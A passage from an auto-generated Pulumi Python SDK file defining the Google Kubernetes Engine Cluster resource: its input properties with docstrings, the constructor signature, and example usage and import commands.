def master_authorized_networks_config(self, value: Optional[pulumi.Input['ClusterMasterAuthorizedNetworksConfigArgs']]):
pulumi.set(self, "master_authorized_networks_config", value)
@property
@pulumi.getter(name="masterVersion")
def master_version(self) -> Optional[pulumi.Input[str]]:
"""
The current version of the master in the cluster. This may
be different than the `min_master_version` set in the config if the master
has been updated by GKE.
"""
return pulumi.get(self, "master_version")
@master_version.setter
def master_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "master_version", value)
@property
@pulumi.getter(name="minMasterVersion")
def min_master_version(self) -> Optional[pulumi.Input[str]]:
"""
The minimum version of the master. GKE
will auto-update the master to new versions, so this does not guarantee the
current master version--use the read-only `master_version` field to obtain that.
If unset, the cluster's version will be set by GKE to the version of the most recent
official release (which is not necessarily the latest version). Most users will find
the `container.get_engine_versions` data source useful - it indicates which versions
are available. If you intend to specify versions manually,
[the docs](https://cloud.google.com/kubernetes-engine/versioning-and-upgrades#specifying_cluster_version)
describe the various acceptable formats for this field.
"""
return pulumi.get(self, "min_master_version")
@min_master_version.setter
def min_master_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "min_master_version", value)
@property
@pulumi.getter(name="monitoringConfig")
def monitoring_config(self) -> Optional[pulumi.Input['ClusterMonitoringConfigArgs']]:
"""
Monitoring configuration for the cluster.
Structure is documented below.
"""
return pulumi.get(self, "monitoring_config")
@monitoring_config.setter
def monitoring_config(self, value: Optional[pulumi.Input['ClusterMonitoringConfigArgs']]):
pulumi.set(self, "monitoring_config", value)
@property
@pulumi.getter(name="monitoringService")
def monitoring_service(self) -> Optional[pulumi.Input[str]]:
"""
The monitoring service that the cluster
should write metrics to.
Automatically send metrics from pods in the cluster to the Google Cloud Monitoring API.
VM metrics will be collected by Google Compute Engine regardless of this setting
Available options include
`monitoring.googleapis.com`(Legacy Stackdriver), `monitoring.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Monitoring), and `none`.
Defaults to `monitoring.googleapis.com/kubernetes`
"""
return pulumi.get(self, "monitoring_service")
@monitoring_service.setter
def monitoring_service(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "monitoring_service", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the cluster, unique within the project and
location.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def network(self) -> Optional[pulumi.Input[str]]:
"""
The name or self_link of the Google Compute Engine
network to which the cluster is connected. For Shared VPC, set this to the self link of the
shared network.
"""
return pulumi.get(self, "network")
@network.setter
def network(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "network", value)
@property
@pulumi.getter(name="networkPolicy")
def network_policy(self) -> Optional[pulumi.Input['ClusterNetworkPolicyArgs']]:
"""
Configuration options for the
[NetworkPolicy](https://kubernetes.io/docs/concepts/services-networking/networkpolicies/)
feature. Structure is documented below.
"""
return pulumi.get(self, "network_policy")
@network_policy.setter
def network_policy(self, value: Optional[pulumi.Input['ClusterNetworkPolicyArgs']]):
pulumi.set(self, "network_policy", value)
@property
@pulumi.getter(name="networkingMode")
def networking_mode(self) -> Optional[pulumi.Input[str]]:
"""
Determines whether alias IPs or routes will be used for pod IPs in the cluster.
Options are `VPC_NATIVE` or `ROUTES`. `VPC_NATIVE` enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
and requires the `ip_allocation_policy` block to be defined. By default when this field is unspecified, GKE will create a `ROUTES`-based cluster.
"""
return pulumi.get(self, "networking_mode")
@networking_mode.setter
def networking_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "networking_mode", value)
@property
@pulumi.getter(name="nodeConfig")
def node_config(self) -> Optional[pulumi.Input['ClusterNodeConfigArgs']]:
"""
Parameters used in creating the default node pool.
Generally, this field should not be used at the same time as a
`container.NodePool` or a `node_pool` block; this configuration
manages the default node pool, which isn't recommended to be used.
Structure is documented below.
"""
return pulumi.get(self, "node_config")
@node_config.setter
def node_config(self, value: Optional[pulumi.Input['ClusterNodeConfigArgs']]):
pulumi.set(self, "node_config", value)
@property
@pulumi.getter(name="nodeLocations")
def node_locations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The list of zones in which the cluster's nodes
are located. Nodes must be in the region of their regional cluster or in the
same region as their cluster's zone for zonal clusters. If this is specified for
a zonal cluster, omit the cluster's zone.
"""
return pulumi.get(self, "node_locations")
@node_locations.setter
def node_locations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "node_locations", value)
@property
@pulumi.getter(name="nodePools")
def node_pools(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ClusterNodePoolArgs']]]]:
"""
List of node pools associated with this cluster.
See container.NodePool for schema.
**Warning:** node pools defined inside a cluster can't be changed (or added/removed) after
cluster creation without deleting and recreating the entire cluster. Unless you absolutely need the ability
to say "these are the _only_ node pools associated with this cluster", use the
container.NodePool resource instead of this property.
"""
return pulumi.get(self, "node_pools")
@node_pools.setter
def node_pools(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ClusterNodePoolArgs']]]]):
pulumi.set(self, "node_pools", value)
@property
@pulumi.getter(name="nodeVersion")
def node_version(self) -> Optional[pulumi.Input[str]]:
"""
The Kubernetes version on the nodes. Must either be unset
or set to the same value as `min_master_version` on create. Defaults to the default
version set by GKE which is not necessarily the latest version. This only affects
nodes in the default node pool. While a fuzzy version can be specified, it's
recommended that you specify explicit versions as the provider will see spurious diffs
when fuzzy versions are used. See the `container.get_engine_versions` data source's
`version_prefix` field to approximate fuzzy versions.
To update nodes in other node pools, use the `version` attribute on the node pool.
"""
return pulumi.get(self, "node_version")
@node_version.setter
def node_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "node_version", value)
@property
@pulumi.getter(name="notificationConfig")
def notification_config(self) -> Optional[pulumi.Input['ClusterNotificationConfigArgs']]:
"""
Configuration for the [cluster upgrade notifications](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-upgrade-notifications) feature. Structure is documented below.
"""
return pulumi.get(self, "notification_config")
@notification_config.setter
def notification_config(self, value: Optional[pulumi.Input['ClusterNotificationConfigArgs']]):
pulumi.set(self, "notification_config", value)
@property
@pulumi.getter
def operation(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "operation")
@operation.setter
def operation(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "operation", value)
@property
@pulumi.getter(name="podSecurityPolicyConfig")
def pod_security_policy_config(self) -> Optional[pulumi.Input['ClusterPodSecurityPolicyConfigArgs']]:
"""
) Configuration for the
[PodSecurityPolicy](https://cloud.google.com/kubernetes-engine/docs/how-to/pod-security-policies) feature.
Structure is documented below.
"""
return pulumi.get(self, "pod_security_policy_config")
@pod_security_policy_config.setter
def pod_security_policy_config(self, value: Optional[pulumi.Input['ClusterPodSecurityPolicyConfigArgs']]):
pulumi.set(self, "pod_security_policy_config", value)
@property
@pulumi.getter(name="privateClusterConfig")
def private_cluster_config(self) -> Optional[pulumi.Input['ClusterPrivateClusterConfigArgs']]:
"""
Configuration for [private clusters](https://cloud.google.com/kubernetes-engine/docs/how-to/private-clusters),
clusters with private nodes. Structure is documented below.
"""
return pulumi.get(self, "private_cluster_config")
@private_cluster_config.setter
def private_cluster_config(self, value: Optional[pulumi.Input['ClusterPrivateClusterConfigArgs']]):
pulumi.set(self, "private_cluster_config", value)
@property
@pulumi.getter(name="privateIpv6GoogleAccess")
def private_ipv6_google_access(self) -> Optional[pulumi.Input[str]]:
"""
The desired state of IPv6 connectivity to Google Services. By default, no private IPv6 access to or from Google Services (all access will be via IPv4).
"""
return pulumi.get(self, "private_ipv6_google_access")
@private_ipv6_google_access.setter
def private_ipv6_google_access(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_ipv6_google_access", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs. If it
is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="releaseChannel")
def release_channel(self) -> Optional[pulumi.Input['ClusterReleaseChannelArgs']]:
"""
Configuration options for the [Release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels)
feature, which provide more control over automatic upgrades of your GKE clusters.
When updating this field, GKE imposes specific version requirements. See
[Selecting a new release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels#selecting_a_new_release_channel)
for more details; the `container.get_engine_versions` datasource can provide
the default version for a channel. Note that removing the `release_channel`
field from your config will cause the provider to stop managing your cluster's
release channel, but will not unenroll it. Instead, use the `"UNSPECIFIED"`
channel. Structure is documented below.
"""
return pulumi.get(self, "release_channel")
@release_channel.setter
def release_channel(self, value: Optional[pulumi.Input['ClusterReleaseChannelArgs']]):
pulumi.set(self, "release_channel", value)
@property
@pulumi.getter(name="removeDefaultNodePool")
def remove_default_node_pool(self) -> Optional[pulumi.Input[bool]]:
"""
If `true`, deletes the default node
pool upon cluster creation. If you're using `container.NodePool`
resources with no default node pool, this should be set to `true`, alongside
setting `initial_node_count` to at least `1`.
"""
return pulumi.get(self, "remove_default_node_pool")
@remove_default_node_pool.setter
def remove_default_node_pool(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "remove_default_node_pool", value)
@property
@pulumi.getter(name="resourceLabels")
def resource_labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
The GCE resource labels (a map of key/value pairs) to be applied to the cluster.
"""
return pulumi.get(self, "resource_labels")
@resource_labels.setter
def resource_labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "resource_labels", value)
@property
@pulumi.getter(name="resourceUsageExportConfig")
def resource_usage_export_config(self) -> Optional[pulumi.Input['ClusterResourceUsageExportConfigArgs']]:
"""
Configuration for the
[ResourceUsageExportConfig](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-usage-metering) feature.
Structure is documented below.
"""
return pulumi.get(self, "resource_usage_export_config")
@resource_usage_export_config.setter
def resource_usage_export_config(self, value: Optional[pulumi.Input['ClusterResourceUsageExportConfigArgs']]):
pulumi.set(self, "resource_usage_export_config", value)
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> Optional[pulumi.Input[str]]:
"""
The server-defined URL for the resource.
"""
return pulumi.get(self, "self_link")
@self_link.setter
def self_link(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "self_link", value)
@property
@pulumi.getter(name="servicesIpv4Cidr")
def services_ipv4_cidr(self) -> Optional[pulumi.Input[str]]:
"""
The IP address range of the Kubernetes services in this
cluster, in [CIDR](http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing)
notation (e.g. `1.2.3.4/29`). Service addresses are typically put in the last
`/16` from the container CIDR.
"""
return pulumi.get(self, "services_ipv4_cidr")
@services_ipv4_cidr.setter
def services_ipv4_cidr(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "services_ipv4_cidr", value)
@property
@pulumi.getter
def subnetwork(self) -> Optional[pulumi.Input[str]]:
"""
The name or self_link of the Google Compute Engine
subnetwork in which the cluster's instances are launched.
"""
return pulumi.get(self, "subnetwork")
@subnetwork.setter
def subnetwork(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnetwork", value)
@property
@pulumi.getter(name="tpuIpv4CidrBlock")
def tpu_ipv4_cidr_block(self) -> Optional[pulumi.Input[str]]:
"""
The IP address range of the Cloud TPUs in this cluster, in
[CIDR](http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing)
notation (e.g. `1.2.3.4/29`).
"""
return pulumi.get(self, "tpu_ipv4_cidr_block")
@tpu_ipv4_cidr_block.setter
def tpu_ipv4_cidr_block(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tpu_ipv4_cidr_block", value)
@property
@pulumi.getter(name="verticalPodAutoscaling")
def vertical_pod_autoscaling(self) -> Optional[pulumi.Input['ClusterVerticalPodAutoscalingArgs']]:
"""
Vertical Pod Autoscaling automatically adjusts the resources of pods controlled by it.
Structure is documented below.
"""
return pulumi.get(self, "vertical_pod_autoscaling")
@vertical_pod_autoscaling.setter
def vertical_pod_autoscaling(self, value: Optional[pulumi.Input['ClusterVerticalPodAutoscalingArgs']]):
pulumi.set(self, "vertical_pod_autoscaling", value)
@property
@pulumi.getter(name="workloadIdentityConfig")
def workload_identity_config(self) -> Optional[pulumi.Input['ClusterWorkloadIdentityConfigArgs']]:
"""
Workload Identity allows Kubernetes service accounts to act as a user-managed
[Google IAM Service Account](https://cloud.google.com/iam/docs/service-accounts#user-managed_service_accounts).
Structure is documented below.
"""
return pulumi.get(self, "workload_identity_config")
@workload_identity_config.setter
def workload_identity_config(self, value: Optional[pulumi.Input['ClusterWorkloadIdentityConfigArgs']]):
pulumi.set(self, "workload_identity_config", value)
class Cluster(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
addons_config: Optional[pulumi.Input[pulumi.InputType['ClusterAddonsConfigArgs']]] = None,
authenticator_groups_config: Optional[pulumi.Input[pulumi.InputType['ClusterAuthenticatorGroupsConfigArgs']]] = None,
cluster_autoscaling: Optional[pulumi.Input[pulumi.InputType['ClusterClusterAutoscalingArgs']]] = None,
cluster_ipv4_cidr: Optional[pulumi.Input[str]] = None,
cluster_telemetry: Optional[pulumi.Input[pulumi.InputType['ClusterClusterTelemetryArgs']]] = None,
confidential_nodes: Optional[pulumi.Input[pulumi.InputType['ClusterConfidentialNodesArgs']]] = None,
database_encryption: Optional[pulumi.Input[pulumi.InputType['ClusterDatabaseEncryptionArgs']]] = None,
datapath_provider: Optional[pulumi.Input[str]] = None,
default_max_pods_per_node: Optional[pulumi.Input[int]] = None,
default_snat_status: Optional[pulumi.Input[pulumi.InputType['ClusterDefaultSnatStatusArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
dns_config: Optional[pulumi.Input[pulumi.InputType['ClusterDnsConfigArgs']]] = None,
enable_autopilot: Optional[pulumi.Input[bool]] = None,
enable_binary_authorization: Optional[pulumi.Input[bool]] = None,
enable_intranode_visibility: Optional[pulumi.Input[bool]] = None,
enable_kubernetes_alpha: Optional[pulumi.Input[bool]] = None,
enable_l4_ilb_subsetting: Optional[pulumi.Input[bool]] = None,
enable_legacy_abac: Optional[pulumi.Input[bool]] = None,
enable_shielded_nodes: Optional[pulumi.Input[bool]] = None,
enable_tpu: Optional[pulumi.Input[bool]] = None,
identity_service_config: Optional[pulumi.Input[pulumi.InputType['ClusterIdentityServiceConfigArgs']]] = None,
initial_node_count: Optional[pulumi.Input[int]] = None,
ip_allocation_policy: Optional[pulumi.Input[pulumi.InputType['ClusterIpAllocationPolicyArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
logging_config: Optional[pulumi.Input[pulumi.InputType['ClusterLoggingConfigArgs']]] = None,
logging_service: Optional[pulumi.Input[str]] = None,
maintenance_policy: Optional[pulumi.Input[pulumi.InputType['ClusterMaintenancePolicyArgs']]] = None,
master_auth: Optional[pulumi.Input[pulumi.InputType['ClusterMasterAuthArgs']]] = None,
master_authorized_networks_config: Optional[pulumi.Input[pulumi.InputType['ClusterMasterAuthorizedNetworksConfigArgs']]] = None,
min_master_version: Optional[pulumi.Input[str]] = None,
monitoring_config: Optional[pulumi.Input[pulumi.InputType['ClusterMonitoringConfigArgs']]] = None,
monitoring_service: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network: Optional[pulumi.Input[str]] = None,
network_policy: Optional[pulumi.Input[pulumi.InputType['ClusterNetworkPolicyArgs']]] = None,
networking_mode: Optional[pulumi.Input[str]] = None,
node_config: Optional[pulumi.Input[pulumi.InputType['ClusterNodeConfigArgs']]] = None,
node_locations: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
node_pools: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ClusterNodePoolArgs']]]]] = None,
node_version: Optional[pulumi.Input[str]] = None,
notification_config: Optional[pulumi.Input[pulumi.InputType['ClusterNotificationConfigArgs']]] = None,
pod_security_policy_config: Optional[pulumi.Input[pulumi.InputType['ClusterPodSecurityPolicyConfigArgs']]] = None,
private_cluster_config: Optional[pulumi.Input[pulumi.InputType['ClusterPrivateClusterConfigArgs']]] = None,
private_ipv6_google_access: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
release_channel: Optional[pulumi.Input[pulumi.InputType['ClusterReleaseChannelArgs']]] = None,
remove_default_node_pool: Optional[pulumi.Input[bool]] = None,
resource_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
resource_usage_export_config: Optional[pulumi.Input[pulumi.InputType['ClusterResourceUsageExportConfigArgs']]] = None,
subnetwork: Optional[pulumi.Input[str]] = None,
vertical_pod_autoscaling: Optional[pulumi.Input[pulumi.InputType['ClusterVerticalPodAutoscalingArgs']]] = None,
workload_identity_config: Optional[pulumi.Input[pulumi.InputType['ClusterWorkloadIdentityConfigArgs']]] = None,
__props__=None):
"""
Manages a Google Kubernetes Engine (GKE) cluster. For more information see
[the official documentation](https://cloud.google.com/container-engine/docs/clusters)
and [the API reference](https://cloud.google.com/kubernetes-engine/docs/reference/rest/v1beta1/projects.locations.clusters).
> **Note:** All arguments and attributes, including basic auth username and
passwords as well as certificate outputs will be stored in the raw state as
plaintext. [Read more about secrets in state](https://www.pulumi.com/docs/intro/concepts/programming-model/#secrets).
## Example Usage
### With A Separately Managed Node Pool (Recommended)
```python
import pulumi
import pulumi_gcp as gcp
default = gcp.service_account.Account("default",
account_id="service-account-id",
display_name="Service Account")
primary = gcp.container.Cluster("primary",
location="us-central1",
remove_default_node_pool=True,
initial_node_count=1)
primary_preemptible_nodes = gcp.container.NodePool("primaryPreemptibleNodes",
location="us-central1",
cluster=primary.name,
node_count=1,
node_config=gcp.container.NodePoolNodeConfigArgs(
preemptible=True,
machine_type="e2-medium",
service_account=default.email,
oauth_scopes=["https://www.googleapis.com/auth/cloud-platform"],
))
```
> **Note:** It is recommended that node pools be created and managed as separate resources as in the example above.
This allows node pools to be added and removed without recreating the cluster. Node pools defined directly in the
`container.Cluster` resource cannot be removed without re-creating the cluster.
### Autopilot
```python
import pulumi
import pulumi_gcp as gcp
default = gcp.service_account.Account("default",
account_id="service-account-id",
display_name="Service Account")
primary = gcp.container.Cluster("primary",
enable_autopilot=True,
location="us-central1-a")
```
## Import
GKE clusters can be imported using the `project` , `location`, and `name`. If the project is omitted, the default provider value will be used. Examples
```sh
$ pulumi import gcp:container/cluster:Cluster mycluster projects/my-gcp-project/locations/us-east1-a/clusters/my-cluster
```
```sh
$ pulumi import gcp:container/cluster:Cluster mycluster my-gcp-project/us-east1-a/my-cluster
```
```sh
$ pulumi import gcp:container/cluster:Cluster mycluster us-east1-a/my-cluster
```
For example, the following fields will show diffs if set in config* `min_master_version` * `remove_default_node_pool`
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['ClusterAddonsConfigArgs']] addons_config: The configuration for addons supported by GKE.
Structure is documented below.
:param pulumi.Input[pulumi.InputType['ClusterAuthenticatorGroupsConfigArgs']] authenticator_groups_config: Configuration for the
[Google Groups for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control#groups-setup-gsuite) feature.
Structure is documented below.
:param pulumi.Input[pulumi.InputType['ClusterClusterAutoscalingArgs']] cluster_autoscaling: Per-cluster configuration of Node Auto-Provisioning with Cluster Autoscaler to
automatically adjust the size of the cluster and create/delete node pools based
on the current needs of the cluster's workload. See the
[guide to using Node Auto-Provisioning](https://cloud.google.com/kubernetes-engine/docs/how-to/node-auto-provisioning)
for more details. Structure is documented below.
:param pulumi.Input[str] cluster_ipv4_cidr: The IP address range of the Kubernetes pods
in this cluster in CIDR notation (e.g. `10.96.0.0/14`). Leave blank to have one
automatically chosen or specify a `/14` block in `10.0.0.0/8`. This field will
only work for routes-based clusters, where `ip_allocation_policy` is not defined.
:param pulumi.Input[pulumi.InputType['ClusterClusterTelemetryArgs']] cluster_telemetry: Configuration for
[ClusterTelemetry](https://cloud.google.com/monitoring/kubernetes-engine/installing#controlling_the_collection_of_application_logs) feature,
Structure is documented below.
:param pulumi.Input[pulumi.InputType['ClusterConfidentialNodesArgs']] confidential_nodes: Configuration for [Confidential Nodes](https://cloud.google.com/kubernetes-engine/docs/how-to/confidential-gke-nodes) feature. Structure is documented below documented below.
:param pulumi.Input[pulumi.InputType['ClusterDatabaseEncryptionArgs']] database_encryption: Structure is documented below.
:param pulumi.Input[str] datapath_provider: The desired datapath provider for this cluster. By default, uses the IPTables-based kube-proxy implementation.
:param pulumi.Input[int] default_max_pods_per_node: The default maximum number of pods
per node in this cluster. This doesn't work on "routes-based" clusters, clusters
that don't have IP Aliasing enabled. See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/how-to/flexible-pod-cidr)
for more information.
:param pulumi.Input[pulumi.InputType['ClusterDefaultSnatStatusArgs']] default_snat_status: [GKE SNAT](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-masquerade-agent#how_ipmasq_works) DefaultSnatStatus contains the desired state of whether default sNAT should be disabled on the cluster, [API doc](https://cloud.google.com/kubernetes-engine/docs/reference/rest/v1beta1/projects.locations.clusters#networkconfig). Structure is documented below
:param pulumi.Input[str] description: Description of the cluster.
:param pulumi.Input[pulumi.InputType['ClusterDnsConfigArgs']] dns_config: Configuration for [Using Cloud DNS for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/cloud-dns). Structure is documented below.
:param pulumi.Input[bool] enable_autopilot: Enable Autopilot for this cluster. Defaults to `false`.
Note that when this option is enabled, certain features of Standard GKE are not available.
See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/concepts/autopilot-overview#comparison)
for available features.
:param pulumi.Input[bool] enable_binary_authorization: Enable Binary Authorization for this cluster.
If enabled, all container images will be validated by Google Binary Authorization.
:param pulumi.Input[bool] enable_intranode_visibility: Whether Intra-node visibility is enabled for this cluster. This makes same node pod to pod traffic visible for VPC network.
:param pulumi.Input[bool] enable_kubernetes_alpha: Whether to enable Kubernetes Alpha features for
this cluster. Note that when this option is enabled, the cluster cannot be upgraded
and will be automatically deleted after 30 days.
:param pulumi.Input[bool] enable_l4_ilb_subsetting: Whether L4ILB Subsetting is enabled for this cluster.
:param pulumi.Input[bool] enable_legacy_abac: Whether the ABAC authorizer is enabled for this cluster.
When enabled, identities in the system, including service accounts, nodes, and controllers,
will have statically granted permissions beyond those provided by the RBAC configuration or IAM.
Defaults to `false`
:param pulumi.Input[bool] enable_shielded_nodes: Enable Shielded Nodes features on all nodes in this cluster. Defaults to `true`.
:param pulumi.Input[bool] enable_tpu: Whether to enable Cloud TPU resources in this cluster.
See the [official documentation](https://cloud.google.com/tpu/docs/kubernetes-engine-setup).
:param pulumi.Input[pulumi.InputType['ClusterIdentityServiceConfigArgs']] identity_service_config: . Structure is documented below.
:param pulumi.Input[int] initial_node_count: The number of nodes to create in this
cluster's default node pool. In regional or multi-zonal clusters, this is the
number of nodes per zone. Must be set if `node_pool` is not set. If you're using
`container.NodePool` objects with no default node pool, you'll need to
set this to a value of at least `1`, alongside setting
`remove_default_node_pool` to `true`.
:param pulumi.Input[pulumi.InputType['ClusterIpAllocationPolicyArgs']] ip_allocation_policy: Configuration of cluster IP allocation for
VPC-native clusters. Adding this block enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
making the cluster VPC-native instead of routes-based. Structure is documented
below.
:param pulumi.Input[str] location: The location (region or zone) in which the cluster
master will be created, as well as the default node location. If you specify a
zone (such as `us-central1-a`), the cluster will be a zonal cluster with a
single cluster master. If you specify a region (such as `us-west1`), the
cluster will be a regional cluster with multiple masters spread across zones in
the region, and with default node locations in those zones as well
:param pulumi.Input[pulumi.InputType['ClusterLoggingConfigArgs']] logging_config: Logging configuration for the cluster.
Structure is documented below.
:param pulumi.Input[str] logging_service: The logging service that the cluster should
write logs to. Available options include `logging.googleapis.com`(Legacy Stackdriver),
`logging.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Logging), and `none`. Defaults to `logging.googleapis.com/kubernetes`
:param pulumi.Input[pulumi.InputType['ClusterMaintenancePolicyArgs']] maintenance_policy: The maintenance policy to use for the cluster. Structure is
documented below.
:param pulumi.Input[pulumi.InputType['ClusterMasterAuthArgs']] master_auth: The authentication information for accessing the
Kubernetes master. Some values in this block are only returned by the API if
your service account has permission to get credentials for your GKE cluster. If
you see an unexpected diff unsetting your client cert, ensure you have the
`container.clusters.getCredentials` permission.
Structure is documented below.
:param pulumi.Input[pulumi.InputType['ClusterMasterAuthorizedNetworksConfigArgs']] master_authorized_networks_config: The desired
configuration options for master authorized networks. Omit the
nested `cidr_blocks` attribute to disallow external access (except
the cluster node IPs, which GKE automatically whitelists).
Structure is documented below.
:param pulumi.Input[str] min_master_version: The minimum version of the master. GKE
will auto-update the master to new versions, so this does not guarantee the
current master version--use the read-only `master_version` field to obtain that.
If unset, the cluster's version will be set by GKE to the version of the most recent
official release (which is not necessarily the latest version). Most users will find
the `container.get_engine_versions` data source useful - it indicates which versions
are available. If you intend to specify versions manually,
[the docs](https://cloud.google.com/kubernetes-engine/versioning-and-upgrades#specifying_cluster_version)
describe the various acceptable formats for this field.
:param pulumi.Input[pulumi.InputType['ClusterMonitoringConfigArgs']] monitoring_config: Monitoring configuration for the cluster.
Structure is documented below.
:param pulumi.Input[str] monitoring_service: The monitoring service that the cluster
should write metrics to.
Automatically send metrics from pods in the cluster to the Google Cloud Monitoring API.
VM metrics will be collected by Google Compute Engine regardless of this setting
Available options include
`monitoring.googleapis.com`(Legacy Stackdriver), `monitoring.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Monitoring), and `none`.
Defaults to `monitoring.googleapis.com/kubernetes`
:param pulumi.Input[str] name: The name of the cluster, unique within the project and
location.
:param pulumi.Input[str] network: The name or self_link of the Google Compute Engine
network to which the cluster is connected. For Shared VPC, set this to the self link of the
shared network.
:param pulumi.Input[pulumi.InputType['ClusterNetworkPolicyArgs']] network_policy: Configuration options for the
[NetworkPolicy](https://kubernetes.io/docs/concepts/services-networking/networkpolicies/)
feature. Structure is documented below.
:param pulumi.Input[str] networking_mode: Determines whether alias IPs or routes will be used for pod IPs in the cluster.
Options are `VPC_NATIVE` or `ROUTES`. `VPC_NATIVE` enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
and requires the `ip_allocation_policy` block to be defined. By default when this field is unspecified, GKE will create a `ROUTES`-based cluster.
:param pulumi.Input[pulumi.InputType['ClusterNodeConfigArgs']] node_config: Parameters used in creating the default node pool.
Generally, this field should not be used at the same time as a
`container.NodePool` or a `node_pool` block; this configuration
manages the default node pool, which isn't recommended to be used.
Structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] node_locations: The list of zones in which the cluster's nodes
are located. Nodes must be in the region of their regional cluster or in the
same region as their cluster's zone for zonal clusters. If this is specified for
a zonal cluster, omit the cluster's zone.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ClusterNodePoolArgs']]]] node_pools: List of node pools associated with this cluster.
See container.NodePool for schema.
**Warning:** node pools defined inside a cluster can't be changed (or added/removed) after
cluster creation without deleting and recreating the entire cluster. Unless you absolutely need the ability
to say "these are the _only_ node pools associated with this cluster", use the
container.NodePool resource instead of this property.
:param pulumi.Input[str] node_version: The Kubernetes version on the nodes. Must either be unset
or set to the same value as `min_master_version` on create. Defaults to the default
version set by GKE which is not necessarily the latest version. This only affects
nodes in the default node pool. While a fuzzy version can be specified, it's
recommended that you specify explicit versions as the provider will see spurious diffs
when fuzzy versions are used. See the `container.get_engine_versions` data source's
`version_prefix` field to approximate fuzzy versions.
To update nodes in other node pools, use the `version` attribute on the node pool.
:param pulumi.Input[pulumi.InputType['ClusterNotificationConfigArgs']] notification_config: Configuration for the [cluster upgrade notifications](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-upgrade-notifications) feature. Structure is documented below.
:param pulumi.Input[pulumi.InputType['ClusterPodSecurityPolicyConfigArgs']] pod_security_policy_config: ) Configuration for the
[PodSecurityPolicy](https://cloud.google.com/kubernetes-engine/docs/how-to/pod-security-policies) feature.
Structure is documented below.
:param pulumi.Input[pulumi.InputType['ClusterPrivateClusterConfigArgs']] private_cluster_config: Configuration for [private clusters](https://cloud.google.com/kubernetes-engine/docs/how-to/private-clusters),
clusters with private nodes. Structure is documented below.
:param pulumi.Input[str] private_ipv6_google_access: The desired state of IPv6 connectivity to Google Services. By default, no private IPv6 access to or from Google Services (all access will be via IPv4).
:param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it
is not provided, the provider project is used.
:param pulumi.Input[pulumi.InputType['ClusterReleaseChannelArgs']] release_channel: Configuration options for the [Release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels)
feature, which provide more control over automatic upgrades of your GKE clusters.
When updating this field, GKE imposes specific version requirements. See
[Selecting a new release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels#selecting_a_new_release_channel)
for more details; the `container.get_engine_versions` datasource can provide
the default version for a channel. Note that removing the `release_channel`
field from your config will cause the provider to stop managing your cluster's
release channel, but will not unenroll it. Instead, use the `"UNSPECIFIED"`
channel. Structure is documented below.
:param pulumi.Input[bool] remove_default_node_pool: If `true`, deletes the default node
pool upon cluster creation. If you're using `container.NodePool`
resources with no default node pool, this should be set to `true`, alongside
setting `initial_node_count` to at least `1`.
